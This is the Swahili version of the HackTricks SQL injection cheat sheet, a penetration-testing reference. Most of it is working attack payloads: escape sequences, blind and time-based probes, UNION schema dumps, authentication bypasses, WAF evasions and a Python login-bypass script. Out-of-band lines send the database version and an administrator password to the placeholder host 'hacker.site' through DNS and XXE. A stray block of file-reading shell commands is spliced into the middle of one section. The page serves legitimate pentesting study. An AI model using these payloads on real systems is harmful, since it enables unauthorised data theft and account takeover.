SQL Injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

SQL injection ni nini?

SQL injection ni kasoro ya usalama inayowaruhusu washambuliaji kuingilia maswali ya database ya programu. Urahaishaji huu unaweza kumruhusu mshambuliaji kuona, kubadilisha, au kufuta data ambayo hawapaswi kuipata, ikiwa ni pamoja na taarifa za watumiaji wengine au data yoyote ambayo programu inaweza kupata. Matendo hayo yanaweza kusababisha mabadiliko ya kudumu kwa utendaji au yaliyomo ya programu au hata kuathiri usalama wa seva au kusababisha denial of service.

Utambuzi wa njia za kuingia

Wakati tovuti inaonekana kuwa dhaifu dhidi ya SQL injection (SQLi) kutokana na majibu yasiyo ya kawaida ya seva kwa ingizo zinazohusiana na SQLi, hatua ya kwanza ni kuelewa jinsi ya kuingiza data kwenye query bila kuiharibu. Hii inahitaji kubaini njia ya kutoka katika muktadha wa sasa kwa ufanisi. Hizi ni mifano michache muhimu:

[Nothing]
'
"
`
')
")
`)
'))
"))
`))

Kisha, unahitaji kujua jinsi ya kurekebisha query ili isiwe na makosa. Ili kurekebisha query unaweza ingiza data ili query iliyopita ikubali data mpya, au unaweza tu ingiza data yako na kuongeza ishara ya comment mwishoni.

Kumbuka kwamba ikiwa unaweza kuona ujumbe wa kosa au unaweza kutambua tofauti wakati query inafanya kazi na wakati haifanyi kazi, hatua hii itakuwa rahisi zaidi.

Maoni

MySQL
#comment
-- comment     [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSQL
--comment
/*comment*/

Oracle
--comment

SQLite
--comment
/*comment*/

HQL
HQL does not support comments

Kuhakiki kwa operesheni za kimantiki

Njia ya kuaminika ya kuthibitisha udhaifu wa SQL injection ni kutekeleza operesheni za kimantiki na kuangalia matokeo yanayotarajiwa. Kwa mfano, parameter ya GET kama ?username=Peter ikitoa yaliyomo yanayofanana wakati imebadilishwa kuwa ?username=Peter' or '1'='1 inaashiria SQL injection vulnerability.

Vivyo hivyo, matumizi ya operesheni za kihisabati ni mbinu madhubuti ya kuthibitisha. Kwa mfano, ikiwa kufikia ?id=1 na ?id=2-1 kunatoa matokeo yale yale, ni ishara ya SQL injection.

Mifano inayoonyesha uthibitisho kwa operesheni za kimantiki:

page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false

Orodha hii ya maneno ilitengenezwa kujaribu kuthibitisha SQLinjections kwa njia iliyopendekezwa:

True SQLi

``` true 1 1>0 2-1 0+1 1*1 1%2 1 & 1 1&1 1 && 2 1&&2 -1 || 1 -1||1 -1 oR 1=1 1 aND 1=1 (1)oR(1=1) (1)aND(1=1) -1/**/oR/**/1=1 1/**/aND/**/1=1 1' 1'>'0 2'-'1 0'+'1 1'*'1 1'%'2 1'&'1'='1 1'&&'2'='1 -1'||'1'='1 -1'oR'1'='1 1'aND'1'='1 1" 1">"0 2"-"1 0"+"1 1"*"1 1"%"2 1"&"1"="1 1"&&"2"="1 -1"||"1"="1 -1"oR"1"="1 1"aND"1"="1 1` 1`>`0 2`-`1 0`+`1 1`*`1 1`%`2 1`&`1`=`1 1`&&`2`=`1 -1`||`1`=`1 -1`oR`1`=`1 1`aND`1`=`1 1')>('0 2')-('1 0')+('1 1')*('1 1')%('2 1')&'1'=('1 1')&&'1'=('1 -1')||'1'=('1 -1')oR'1'=('1 1')aND'1'=('1 1")>("0 2")-("1 0")+("1 1")*("1 1")%("2 1")&"1"=("1 1")&&"1"=("1 -1")||"1"=("1 -1")oR"1"=("1 1")aND"1"=("1 1`)>(`0 2`)-(`1 0`)+(`1 1`)*(`1 1`)%(`2 1`)&`1`=(`1 1`)&&`1`=(`1 -1`)||`1`=(`1 -1`)oR`1`=(`1 1`)aND`1`=(`1 ```

Kuthibitisha kwa Muda

Katika baadhi ya kesi huoni mabadiliko yoyote kwenye ukurasa unaojaribu. Kwa hiyo, njia nzuri ya kugundua blind SQL injections ni kumfanya DB ifanye vitendo vitakavyoleta athari kwa muda unaohitajika kwa ukurasa kupakia.
Kwa hivyo, tuta-concat katika SQL query operesheni ambayo itachukua muda mrefu kukamilika:

MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)

PostgreSQL (only support string concat)
1' || pg_sleep(10)

MSQL
1' WAITFOR DELAY '0:0:10'

Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)

SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))

Kwenye baadhi ya matukio sleep functions won’t be allowed. Badala ya kutumia functions hizo unaweza kufanya query ifanye fanye operesheni ngumu ambazo zitachukua sekunde kadhaa. Mifano ya mbinu hizi yataelezewa kando kwa kila teknolojia (ikiwa zipo).

Kutambua Back-end

Njia bora ya kutambua back-end ni kujaribu kuendesha functions za back-end mbalimbali. Unaweza kutumia sleep functions za sehemu ya awali au hizi (jedwali kutoka payloadsallthethings:

["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
["connection_id()=connection_id()"                 ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')"                   ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"       ,"MSSQL"],
["@@CONNECTIONS>0"                                 ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS"                     ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY"                           ,"MSSQL"],
["USER_ID(1)=USER_ID(1)"                           ,"MSSQL"],
["ROWNUM=ROWNUM"                                   ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')"                   ,"ORACLE"],
["LNNVL(0=123)"                                    ,"ORACLE"],
["5::int=5"                                        ,"POSTGRESQL"],
["5::integer=5"                                    ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()"       ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)"         ,"POSTGRESQL"],
["current_database()=current_database()"           ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()"               ,"SQLITE"],
["last_insert_rowid()>1"                           ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()"         ,"SQLITE"],
["val(cvar(1))=1"                                  ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"               ,"MSACCESS"],
["cdbl(1)=cdbl(1)"                                 ,"MSACCESS"],
["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],

Vilevile, ikiwa una ufikiaji wa output ya query, unaweza kuifanya ionyeshe toleo la database.

Tip

Kama muendelezo tutajadili mbinu tofauti za kutekeleza aina mbalimbali za SQL Injection. Tutatumia MySQL kama mfano.

Kutambua kwa kutumia PortSwigger

SQL injection cheat sheet | Web Security Academy

Kutumia Union Based

Detecting number of columns

If you can see the output of the query this is the best way to exploit it.
Kwanza kabisa, tunahitaji kubaini idadi ya columns ambazo initial request inarudisha. Hii ni kwa sababu both queries must return the same number of columns.
Kwa kawaida, njia mbili hutumika kwa madhumuni haya:

Order/Group by

Ili kubaini idadi ya columns katika query, ongeza taratibu namba inayotumika katika vifungu vya ORDER BY au GROUP BY hadi unapopata jibu la kosa. Licha ya tofauti za kazi kati ya GROUP BY na ORDER BY ndani ya SQL, zote zinaweza kutumika kwa njia ile ile kubaini idadi ya columns ya query.

1' ORDER BY 1--+    #True
1' ORDER BY 2--+    #True
1' ORDER BY 3--+    #True
1' ORDER BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True

1' GROUP BY 1--+    #True
1' GROUP BY 2--+    #True
1' GROUP BY 3--+    #True
1' GROUP BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True

UNION SELECT

Select null values zaidi na zaidi hadi query iwe sahihi:

1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked

Unapaswa kutumia nullvalues, kwa sababu katika baadhi ya kesi aina (type) ya columns za pande zote za query lazima iwe sawa, na null ni halali katika kila kesi.

Pata database names, table names na column names

Katika mifano ifuatayo tutapata majina yote ya databases, jina la table la database, na column names za table:

#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata

#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]

#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]

Kuna njia tofauti za kugundua data hii kwa kila database tofauti, lakini mbinu ni ile ile kila wakati.

Kutumia Hidden Union Based

When the output of a query is visible, but a union-based injection seems unachievable, it signifies the presence of a hidden union-based injection. This scenario often leads to a blind injection situation. To transform a blind injection into a union-based one, the execution query on the backend needs to be discerned.

This can be accomplished through the use of blind injection techniques alongside the default tables specific to your target Database Management System (DBMS). For understanding these default tables, consulting the documentation of the target DBMS is advised.

Once the query has been extracted, it’s necessary to tailor your payload to safely close the original query. Subsequently, a union query is appended to your payload, facilitating the exploitation of the newly accessible union-based injection.

For more comprehensive insights, refer to the complete article available at Healing Blind Injections.

Kutumia Error based

Ikiwa kwa sababu fulani cannot see the output of the query, lakini unaweza see the error messages, unaweza kutumia ujumbe hizo za kosa ili ex-filtrate data kutoka kwenye database.
Kwa kufuata mtiririko unaofanana na ule wa Union Based exploitation, unaweza kufanikiwa dump DB.

(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Katika kesi hii huwezi kuona matokeo ya query au errors, lakini unaweza kutofautisha wakati query inarudisha majibu ya true au false kwa sababu kuna maudhui tofauti kwenye ukurasa.
Katika kesi hii, unaweza kutumia tabia hiyo ku-dump database char by char:

?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'

Hii ni hali ile ile kama kabla, lakini badala ya kutofautisha kati ya jibu la true/false kutoka kwa query unaweza kubaini kati ya error katika SQL query au la (labda kwa sababu HTTP server inaanguka). Kwa hivyo, katika kesi hii unaweza kulazimisha SQLerror kila wakati unapobahatisha herufi kwa usahihi:

AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -

Kutumia Time Based SQLi

Katika kesi hii hakuna njia ya kutofautisha majibu ya query kulingana na muktadha wa ukurasa. Lakini, unaweza kufanya ukurasa uchukue muda mrefu zaidi kupakia ikiwa alama iliyokadiriwa ni sahihi. Tayari tumeiona mbinu hii ikitumika hapo awali ili confirm a SQLi vuln.

1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#

Stacked Queries

Unaweza kutumia stacked queries ili kutekeleza queries nyingi mfululizo. Kumbuka kwamba wakati queries zinazofuata zinatekelezwa, matokeo hayarudishiwi kwa programu. Hivyo, mbinu hii inatumika hasa kuhusiana na blind vulnerabilities ambapo unaweza kutumia query ya pili kuanzisha DNS lookup, conditional error, au time delay.

Oracle haisaidii stacked queries. MySQL, Microsoft na PostgreSQL zinaunga mkono hizi: QUERY-1-HERE; QUERY-2-HERE

Out of band Exploitation

Ikiwa hakuna nyingine njia ya exploitation imefanya kazi, unaweza kujaribu kufanya database ex-filtrate taarifa kwa external host unaodhibiti. Kwa mfano, kupitia DNS queries:

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));

Out of band data exfiltration kupitia XXE

a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -

Automated Exploitation

Angalia SQLMap Cheatsheet ili exploit udhaifu wa SQLi kwa kutumia sqlmap.

Maelezo maalum ya teknolojia

Tayari tumejadili njia zote za exploit za udhaifu wa SQL Injection. Tafuta mbinu zaidi zinazotegemea teknolojia ya database katika kitabu hiki:

Au utapata mbinu nyingi kuhusu: MySQL, PostgreSQL, Oracle, MSSQL, SQLite na HQL katika https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

Authentication bypass

Orodha za kujaribu bypass utendakazi wa login:

Raw hash authentication Bypass

"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"

Query hii inaonyesha udhaifu wakati MD5 inapotumika na true kwa raw output katika authentication checks, na kufanya mfumo uwe rahisi kushambuliwa na SQL injection. Wavamizi wanaweza kufaidisha hili kwa kuunda maingizo ambayo, zinapohashed, hutoa sehemu zisizotarajiwa za amri ya SQL, na kupelekea upatikanaji usioidhinishwa.

md5("ffifdyop", true) = 'or'6�]��!r,��b�
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!

Imeingizwa hash authentication Bypass

admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'

Orodha iliyopendekezwa:

Unapaswa kutumia kila mstari wa orodha kama username na kama password kila wakati: Pass1234.
(Payloads hizi pia zipo kwenye orodha kubwa iliyotajwa mwanzoni mwa sehemu hii)

GBK Authentication Bypass

KAMA ’ inapotolewa (escaped) unaweza kutumia %A8%27, na wakati ’ inapofichwa itaundwa: 0xA80x5c0x27 (╘’)

%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --

Python skripti:

import requests
url = "http://example.com/index.php"
cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3')
datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"}
r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url})
print r.text

Polyglot injection (multicontext)

SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

Insert Statement

Badilisha password ya object/user iliyopo

Ili kufanya hivyo jaribu kunda object mpya yenye jina kama the “master object” (labda admin kwa watumiaji) kwa kubadilisha kitu:

Unda user aliyeitwa: AdMIn (herufi kubwa & ndogo)
Unda user aliyeitwa: admin=
SQL Truncation Attack (wakati kuna aina ya length limit kwenye username au email) –> Unda user mwenye jina: admin [a lot of spaces] a

SQL Truncation Attack

Ikiwa database ina hatari na idadi ya max ya chars kwa username ni kwa mfano 30 na ungependa kujifanya user admin, jaribu kuunda username iitwayo: “admin [30 spaces] a” na password yoyote.

Database ita kukagua ikiwa username ulioweka ipo ndani ya database. Ikiwa hapana, itakata username hadi max allowed number of characters (kwa kesi hii hadi: “admin [25 spaces]”) na kisha itafuta kiotomatiki nafasi zote mwishoni ikisasisha ndani ya database user “admin” na password mpya (kosa linaweza kuonekana lakini haimaanishi haijafanya kazi).

More info: https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html & https://resources.infosecinstitute.com/sql-truncation-attack/#gref

Note: This attack will no longer work as described above in latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field will result in an error, and the insertion will fail. For more information about about this check: https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation

MySQL Insert time based checking

Ongeza kiasi cha ','','' unachokiona kinakutosha kutoka kwenye VALUES statement. Ikiwa delay itaendeshwa, una SQLInjection.

name=','');WAITFOR%20DELAY%20'0:0:5'--%20-

ON DUPLICATE KEY UPDATE

Kiambatisho cha ON DUPLICATE KEY UPDATE katika MySQL kinatumika kubainisha hatua ambazo database itachukua wakati jaribio la kuingiza safu litakapotokea kuwa na thamani inayojirudia katika index ya UNIQUE au PRIMARY KEY. Mfano ufuatao unaonyesha jinsi kipengele hiki kinavyoweza kutumiwa kubadilisha nenosiri la akaunti ya msimamizi:

Example Payload Injection:

An injection payload inaweza kutengenezwa kama ifuatavyo, ambapo mistari miwili inajaribu kuingizwa kwenye jedwali la users. Safu ya kwanza ni kisingizio, na safu ya pili inalenga barua pepe ya msimamizi aliyeko kwa nia ya kubadilisha nenosiri:

INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";

Hivi ndivyo inavyofanya kazi:

Query inajaribu kuingiza mistari miwili: moja kwa ajili ya generic_user@example.com na nyingine kwa ajili ya admin_generic@example.com.
Ikiwa row ya admin_generic@example.com tayari ipo, kifungu cha ON DUPLICATE KEY UPDATE kitatumika, kikimwambia MySQL kusasisha field ya password ya row iliyopo kuwa “bcrypt_hash_of_newpassword”.
Kwa hivyo, authentication inaweza kisha kujaribiwa kwa kutumia admin_generic@example.com na password inayolingana na bcrypt hash (“bcrypt_hash_of_newpassword” inawakilisha bcrypt hash ya password mpya, ambayo inapaswa kubadilishwa na hash halisi ya password inayotakiwa).

Pata taarifa

Kuunda 2 accounts kwa wakati mmoja

Unapojaribu kuunda user mpya na username, password na email zinahitajika:

SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -

A new user with username=otherUsername, password=otherPassword, email:FLAG will be created

Kutumia desimali au hexadesimali

Kwa mbinu hii unaweza kutoa taarifa kwa kuunda akaunti 1 tu. Ni muhimu kutambua kuwa huna haja ya ku-comment chochote.

Kutumia hex2dec na substr:

'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

cat src/pentesting-web/sql-injection/README.md
less src/pentesting-web/sql-injection/README.md
sed -n ‘1,200p’ src/pentesting-web/sql-injection/README.md
awk ‘1’ src/pentesting-web/sql-injection/README.md
bat src/pentesting-web/sql-injection/README.md

Git:

git show HEAD:src/pentesting-web/sql-injection/README.md
git show origin/main:src/pentesting-web/sql-injection/README.md

PowerShell (Windows):

Get-Content -Raw .\src\pentesting-web\sql-injection\README.md

From a remote repo (replace , , ):

curl -s https://raw.githubusercontent.com////src/pentesting-web/sql-injection/README.md

__import__('binascii').unhexlify(hex(215573607263)[2:])

Kutumia hex na replace (na substr):

'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

Routed SQL injection

Routed SQL injection ni hali ambapo query inayoweza kuingizwa siyo ile inayotoa matokeo, bali matokeo ya query inayoweza kuingizwa hupelekwa kwa query inayotoa matokeo. (From Paper)

Mfano:

#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a

WAF Bypass

Initial bypasses kutoka hapa

No spaces bypass

No Space (%20) - bypass kwa kutumia mbadala za whitespace

?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--

No Whitespace - bypass kwa kutumia comments

?id=1/*comment*/and/**/1=1/**/--

No Whitespace - bypass kwa kutumia parenthesis

?id=(1)and(1)=(1)--

No commas bypass

No Comma - bypass kutumia OFFSET, FROM na JOIN

LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d

Bypasses za Jumla

Blacklist kwa kutumia keywords - bypass kwa kutumia uppercase/lowercase

?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#

Blacklist ukitumia maneno muhimu bila kuzingatia herufi kubwa/ndogo - bypass kwa kutumia operator sawa

AND   -> && -> %26%26
OR    -> || -> %7C%7C
=     -> LIKE,REGEXP,RLIKE, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))

Scientific Notation WAF bypass

Unaweza kupata maelezo ya kina zaidi kuhusu ujanja huu kwenye gosecure blog.
Kwa kifupi unaweza kutumia scientific notation kwa njia zisizotarajiwa ili kuepuka WAF:

-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=

Kupita Vikwazo vya Majina ya Safu

Kwanza kabisa, kumbuka kwamba ikiwa original query na jedwali ambako unataka kutoa flag zina idadi sawa ya safu unaweza tu kufanya: 0 UNION SELECT * FROM flag

Inawezekana kupata safu ya tatu ya jedwali bila kutumia jina lake kwa kutumia query kama ifuatavyo: SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;, hivyo katika sqlinjection hii itaonekana kama:

# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;

Au kutumia comma bypass:

# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c

Ujanja huu ulichukuliwa kutoka kwa https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/

Column/tablename injection in SELECT list via subqueries

Ikiwa input ya mtumiaji inaunganishwa kwenye SELECT list au table/column identifiers, prepared statements hazitasaidia kwa sababu bind parameters hulinda tu values, sio identifiers. Mfano wa kawaida wa udhaifu ni:

// Pseudocode
$fieldname = $_REQUEST['fieldname']; // attacker-controlled
$tablename = $modInstance->table_name; // sometimes also attacker-influenced
$q = "SELECT $fieldname FROM $tablename WHERE id=?"; // id is the only bound param
$stmt = $db->pquery($q, [$rec_id]);

Wazo la exploitation: inject a subquery katika field position ili exfiltrate arbitrary data:

-- Legit
SELECT user_name FROM vte_users WHERE id=1;

-- Injected subquery to extract a sensitive value (e.g., password reset token)
SELECT (SELECT token FROM vte_userauthtoken WHERE userid=1) FROM vte_users WHERE id=1;

Vidokezo:

Hii inafanya kazi hata wakati WHERE clause inatumia bound parameter, kwa sababu orodha ya identifiers bado inachanganywa kama string.
Baadhi ya stacks pia zinaweza kukuruhusu kudhibiti table name (tablename injection), kuwezesha kusoma kuvuka-jedwali.
Output sinks zinaweza kuonyesha thamani iliyochaguliwa ndani ya HTML/JSON, kuruhusu XSS au token exfiltration moja kwa moja kutoka kwenye response.

Mitigations:

Usichanganye identifiers kutoka kwa input ya mtumiaji. Ramishea majina ya column yaliyoruhusiwa kuwa kwenye orodha thabiti ya kuruhusiwa na weka nukuu kwa identifiers ipasavyo.
Ikiwa ufikaji wa jedwali kwa njia ya dynamic unahitajika, uzie mkusanyiko hadi seti ndogo na utatatue upande wa server kutoka kwenye ramani salama.

SQLi via AST/filter-to-SQL converters (JSON_VALUE predicates)

Baadhi ya frameworks convert structured filter ASTs into raw SQL boolean fragments (mfano, metadata filters au JSON predicates) na kisha string-concatenate vipande hivyo kuwa queries kubwa. Ikiwa converter wraps string values as '%s' without escaping, nukuu moja katika input ya mtumiaji itamaliza literal na sehemu iliyobaki itachambuliwa kama SQL.

Example pattern (conceptual):

JSON_VALUE(metadata, '$.department') = '<user_value>'

Payload (URL-encoded): %27%20OR%20%271%27%3D%271 → iliyotafsiriwa: ' OR '1'='1 → kigezo kinakuwa:

JSON_VALUE(metadata, '$.department') = '' OR '1'='1'

ORDER BY / identifier-based SQLi (kizuizi cha PDO)

Prepared statements haziwezi ku-bind identifiers (column au table names). Mfano wa kawaida usio salama ni kuchukua parameter inayodhibiwa na mtumiaji sort na kujenga ORDER BY kwa kutumia string concatenation, wakati mwingine ukizungusha input ndani ya backticks ili “sanitize”. Hii bado inawezesha SQLi kwa sababu muktadha wa identifier ni attacker-controlled.

Mfano dhaifu:

$sort = $_POST['sort'];
$q = "SELECT id,item_name FROM items WHERE user_id=? ORDER BY `$sort`";
$stmt = $pdo->prepare($q);
$stmt->execute([$user_id]);

Signals in traffic:

Parameta ya sort katika POST (mara nyingi sort=column), si orodha thabiti ya kuruhusiwa.
Kubadilisha sort kunavunja query au kunabadilisha mpangilio wa matokeo.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.